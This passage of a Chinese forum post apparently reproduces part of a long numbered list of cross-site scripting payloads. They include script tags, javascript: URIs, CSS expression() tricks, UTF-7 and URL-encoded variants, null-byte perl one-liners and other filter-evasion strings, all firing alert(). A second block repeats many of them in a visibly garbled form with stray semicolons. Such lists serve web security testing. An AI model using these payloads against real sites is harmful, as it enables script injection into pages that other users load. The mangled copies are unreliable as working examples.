  1626. <META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert(2214);">
  1627. <OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value=javascript:alert(2217)></OBJECT>
  1628. a="get";&#10;b="URL("";&#10;c="javascript:";&#10;d="alert(2219);")";
  1629. eval(a+b+c+d);
  1630. <STYLE TYPE="text/javascript">alert(2220);</STYLE>
  1631. <IMG STYLE="xss:expr/*XSS*/ession(alert(2221))">
  1632. <XSS STYLE="xss:expression(alert(2222))">
  1633. <STYLE>.XSS{background-image:url("javascript:alert(2223)");}</STYLE><A CLASS=XSS></A>
  1634. <STYLE type="text/css">BODY{background:url("javascript:alert(2224)")}</STYLE>
  1635. <LINK REL="stylesheet" HREF="javascript:alert(2225);">
  1636. <TABLE BACKGROUND="javascript:alert(2230)"></TABLE>
  1637. <TABLE><TD BACKGROUND="javascript:alert(2231)"></TD></TABLE>
  1638. <XML ID=I><X><C><![CDATA[<IMG SRC="javas]]><![CDATA[cript:alert(2233);">]]>
  1639. <XML ID="xss"><I><B><IMG SRC="javas<!-- -->cript:alert(2234)"></B></I></XML>
  1640. <META HTTP-EQUIV="Set-Cookie" Content="USERID=<SCRIPT>alert(2238)</SCRIPT>">
  1641. <BR SIZE="&{alert(2243)}">
  1642. <IMG SRC=JaVaScRiPt:alert(2244)>
  1643. <IMG SRC=javascript:alert(2245)>
  1644. <IMG SRC=`javascript:alert(2246)`>
  1645. <IMG SRC=javascript:alert(2247))>
  1646. <HEAD><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7"> </HEAD>+ADw-SCRIPT+AD4-alert(2252);+ADw-/SCRIPT+AD4-
  1647. \";alert(2253);//
  1648. </TITLE><SCRIPT>alert(2254);</SCRIPT>
  1649. <STYLE>@im\port&apos;\ja\vasc\ript:alert(2255)&apos;;</STYLE>
  1650. <IMG SRC="jav        ascript:alert(2256);">
  1651. <IMG SRC="jav&#x09;ascript:alert(2257);">
  1652. <IMG SRC="jav&#x0A;ascript:alert(2258);">
  1653. <IMG SRC="jav&#x0D;ascript:alert(2259);">
  1654. perl -e &apos;print "<IMG SRC=java\0script:alert(2261)>";&apos;> out
  1655. perl -e &apos;print "&<SCR\0IPT>alert(2262)</SCR\0IPT>";&apos; > out
  1656. <IMG SRC=" &#14;  javascript:alert(2263);">
  1657. <BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert(2265)>
  1658. <IMG SRC="javascript:alert(2268)"
  1659. <<SCRIPT>alert(2270);//<</SCRIPT>
  1660. <IMG """><SCRIPT>alert(2271)</SCRIPT>">
  1661. "><BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert(2390)>
  1662. </script><script>alert(2391)</script>
  1663. </br style=a:expression(alert(23922392>
  1664. <scrscriptipt>alert(2393)</scrscriptipt>
  1665. <br size=\"&{alert(2394)}\">
  1666. perl -e 'print \"<IMG SRC=java\0script:alert(2395)>\";' > out
  1667. perl -e 'print \"<SCR\0IPT>alert(2396)</SCR\0IPT>\";' > out
  1668. <~/XSS/*-*/STYLE=xss:e/**/xpression(alert(2397))>
  1669. <~/XSS/*-*/STYLE=xss:e/**/xpression(alert(2399))>
  1670. <~/XSS STYLE=xss:expression(alert(2400))>
  1671. "><script>alert(2401)</script>
  1672. </XSS/*-*/STYLE=xss:e/**/xpression(alert(2402))>
  1673. XSS/*-*/STYLE=xss:e/**/xpression(alert(2403))>
  1674. XSS STYLE=xss:e/**/xpression(alert(2404))>
  1675. </XSS STYLE=xss:expression(alert(2405))>
  1676. ';;alert(2406))//\';;alert(2406))//";;alert(2406))//\";;alert(2406))//-->;<;/SCRIPT>;";>;';>;<;SCRIPT>;alert(2406))<;/SCRIPT>;
  1677. <;SCRIPT>;alert(2408)<;/SCRIPT>;
  1678. <;SCRIPT>;alert(2410))<;/SCRIPT>;
  1679. <;BASE HREF=";javascript:alert(2411);//";>;
  1680. <;BGSOUND SRC=";javascript:alert(2412);";>;
  1681. <;BODY BACKGROUND=";javascript:alert(2413);";>;
  1682. <;BODY ONLOAD=alert(2414)>;
  1683. <;DIV STYLE=";background-image: url(javascript:alert(2415))";>;
  1684. <;DIV STYLE=";background-image: url(&;#1;javascript:alert(2416))";>;
  1685. <;DIV STYLE=";width: expression(alert(2417));";>;
  1686. <;FRAMESET>;<;FRAME SRC=";javascript:alert(2418);";>;<;/FRAMESET>;
  1687. <;IFRAME SRC=";javascript:alert(2419);";>;<;/IFRAME>;
  1688. <;INPUT TYPE=";IMAGE"; SRC=";javascript:alert(2420);";>;
  1689. <;IMG SRC=";javascript:alert(2421);";>;
  1690. <;IMG SRC=javascript:alert(2422)>;
  1691. <;IMG DYNSRC=";javascript:alert(2423);";>;
  1692. <;IMG LOWSRC=";javascript:alert(2424);";>;
  1693. <;STYLE>;li {list-style-image: url(";javascript:alert(2428)";);}<;/STYLE>;<;UL>;<;LI>;XSS
  1694. %BCscript%BEalert(2432)%BC/script%BE
  1695. <;META HTTP-EQUIV=";refresh"; CONTENT=";0;url=javascript:alert(2433);";>;
  1696. <;META HTTP-EQUIV=";refresh"; CONTENT=";0; URL=http://;URL=javascript:alert(2435);";>;
  1697. <;OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389>;<;param name=url value=javascript:alert(2438)>;<;/OBJECT>;
  1698. a=";get";;&;#10;b=";URL(";";;&;#10;c=";javascript:";;&;#10;d=";alert(2440);";)";;
  1699. eval(a+b+c+d);
  1700. <;STYLE TYPE=";text/javascript";>;alert(2441);<;/STYLE>;
  1701. <;IMG STYLE=";xss:expr/*XSS*/ession(alert(2442))";>;
  1702. <;XSS STYLE=";xss:expression(alert(2443))";>;
  1703. <;STYLE>;.XSS{background-image:url(";javascript:alert(2444)";);}<;/STYLE>;<;A CLASS=XSS>;<;/A>;
  1704. <;STYLE type=";text/css";>;BODY{background:url(";javascript:alert(2445)";)}<;/STYLE>;
  1705. <;LINK REL=";stylesheet"; HREF=";javascript:alert(2446);";>;
  1706. <;TABLE BACKGROUND=";javascript:alert(2451)";>;<;/TABLE>;
  1707. <;TABLE>;<;TD BACKGROUND=";javascript:alert(2452)";>;<;/TD>;<;/TABLE>;
  1708. <;XML ID=I>;<;X>;<;C>;<;![CDATA[<;IMG SRC=";javas]]>;<;![CDATA[cript:alert(2454);";>;]]>;
  1709. <;XML ID=";xss";>;<;I>;<;B>;<;IMG SRC=";javas<;!-- -->;cript:alert(2455)";>;<;/B>;<;/I>;<;/XML>;
  1710. <;META HTTP-EQUIV=";Set-Cookie"; Content=";USERID=<;SCRIPT>;alert(2459)<;/SCRIPT>;";>;
  1711. <;BR SIZE=";&;{alert(2464)}";>;
  1712. <;IMG SRC=JaVaScRiPt:alert(2465)>;
  1713. <;IMG SRC=javascript:alert(2466)>;
  1714. <;IMG SRC=`javascript:alert(2467)`>;
  1715. <;IMG SRC=javascript:alert(2468))>;
  1716. <;HEAD>;<;META HTTP-EQUIV=";CONTENT-TYPE"; CONTENT=";text/html; charset=UTF-7";>; <;/HEAD>;+ADw-SCRIPT+AD4-alert(2473);+ADw-/SCRIPT+AD4-
  1717. \";;alert(2474);//
  1718. <;/TITLE>;<;SCRIPT>;alert(2475);<;/SCRIPT>;
  1719. <;STYLE>;@im\port';\ja\vasc\ript:alert(2476)';;<;/STYLE>;
  1720. <;IMG SRC=";jav        ascript:alert(2477);";>;
  1721. <;IMG SRC=";jav&;#x09;ascript:alert(2478);";>;
  1722. <;IMG SRC=";jav&;#x0A;ascript:alert(2479);";>;
  1723. <;IMG SRC=";jav&;#x0D;ascript:alert(2480);";>;
  1724. perl -e ';print ";<;IM SRC=java\0script:alert(2482)>";;';>; out
  1725. perl -e ';print ";&;<;SCR\0IPT>;alert(2483)<;/SCR\0IPT>;";;'; >; out
  1726. <;IMG SRC="; &;#14;  javascript:alert(2484);";>;
  1727. <;BODY onload!#$%&;()*~+-_.,:;?@[/|\]^`=alert(2486)>;
  1728. <;IMG SRC=";javascript:alert(2489)";
  1729. <;<;SCRIPT>;alert(2491);//<;<;/SCRIPT>;
  1730. <;IMG ";";";>;<;SCRIPT>;alert(2492)<;/SCRIPT>;";>;
  1731. ";>;<;BODY onload!#$%&;()*~+-_.,:;?@[/|\]^`=alert(2611)>;
  1732. <;/script>;<;script>;alert(2612)<;/script>;
  1733. <;/br style=a:expression(alert(26132613>;
  1734. <;scrscriptipt>;alert(2614)<;/scrscriptipt>;
  1735. <;br size=\";&;{alert(2615)}\";>;
  1736. perl -e 'print \";<;IMG SRC=java\0script:alert(2616)>;\";;' >; out
  1737. perl -e 'print \";<;SCR\0IPT>;alert(2617)<;/SCR\0IPT>;\";;' >; out
  1738. <~/XSS/*-*/STYLE=xss:e/**/xpression(alert(2618))>
  1739. <~/XSS/*-*/STYLE=xss:e/**/xpression(alert(2620))>
  1740. <~/XSS STYLE=xss:expression(alert(2621))>
  1741. "><script>alert(2622)</script>
  1742. </XSS/*-*/STYLE=xss:e/**/xpression(alert(2623))>
  1743. XSS/*-*/STYLE=xss:e/**/xpression(alert(2624))>
  1744. XSS STYLE=xss:e/**/xpression(alert(2625))>
  1745. </XSS STYLE=xss:expression(alert(2626))>
  1746. >"><script>alert(2627)</script>&
  1747. "><STYLE>@import"javascript:alert(2628)";</STYLE>
  1748. >"'><img%20src%3D%26%23x6a;%26%23x61;%26%23x76;%26%23x61;%26%23x73;%26%23x63;%26%23x72;%26%23x69;%26%23x70;%26%23x74;%26%23x3a;alert(2629)>
  1749. >%22%27><img%20src%3d%22javascript:alert(2630)%22>
  1750. '%uff1cscript%uff1ealert(2631)%uff1c/script%uff1e'
  1751. <IMG SRC="javascript:alert(2633);">
  1752. <IMG SRC=javascript:alert(2634)>
  1753. <IMG SRC=JaVaScRiPt:alert(2635)>
  1754. <IMG SRC=JaVaScRiPt:alert(2636)>
  1755. <IMG SRC="jav
  1756. ascript:alert(2640);">
  1757. <IMG SRC="jav
    ascript:alert(2641);">
  1758. <?xml version="1.0" encoding="ISO-8859-1"?><foo><![CDATA[<]]>SCRIPT<![CDATA[>]]>alert(2643);<![CDATA[<]]>/SCRIPT<![CDATA[>]]></foo>
  1759. <script>alert(2649)</script>
  1760. %3cscript%3ealert(2650)%3c/script%3e
  1761. %22%3e%3cscript%3ealert(2651)%3c/script%3e
  1762. <IMG SRC="javascript:alert(2652);">
  1763. <IMG SRC=javascript:alert(2653)>
  1764. <IMG SRC=javascript:alert(2654)>
  1765. <img src=xss onerror=alert(2655)>
  1766. <IMG """><SCRIPT>alert(2656)</SCRIPT>">
  1767. <IMG SRC=javascript:alert(2657))>
  1768. <IMG SRC="jav ascript:alert(2658);">
  1769. <IMG SRC="jav        ascript:alert(2659);">
  1770. <BODY BACKGROUND="javascript:alert(2663)">
  1771. <BODY ONLOAD=alert(2664)>
  1772. <INPUT TYPE="IMAGE" SRC="javascript:alert(2665);">
  1773. <IMG SRC="javascript:alert(2666)"
  1774. <<SCRIPT>alert(2668);//<</SCRIPT>
  1775. %253cscript%253ealert(2669)%253c/script%253e
  1776. "><s"%2b"cript>alert(2670)</script>
  1777. foo<script>alert(2671)</script>
  1778. <scr<script>ipt>alert(2672)</scr</script>ipt>
  1779. ';alert(2674))//\';alert(2674))//";alert(2674))//\";alert(2674))//--></SCRIPT>">'><SCRIPT>alert(2674))</SCRIPT>
  1780. <marquee onstart='javascript:alert(2675);'>=(◕_◕)=
  1781. </span></span><svg onload="alert(2676)//“ #"="">
复制代码
返回列表
高级模式   
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 注册

本版积分规则

犇跑小毛驴 LV4.上士

粉丝:5 关注:0 积分:326

精华:0 金币:433 经验:312

最后登录时间:2024-4-10

安防可视门铃5C 安防可视门铃5Pro 智能摄像机7P 360WiFi6路由器V6G公测勋章 公测儿童手表9X 公测摄像机D916 公测360家庭防火墙V5S 360商城青铜会员

私信 加好友

最新活动

360云台摄像机9Pro写评论送大奖!

排行榜

热度排行 查看排行
今日 本周 本月 全部
    今日 本周 本月 全部

      内容推荐 热门推荐最新主帖

      扫码添加360客服号,涨知识的同时还有超多福利等你哦

      快速回复 返回顶部 返回列表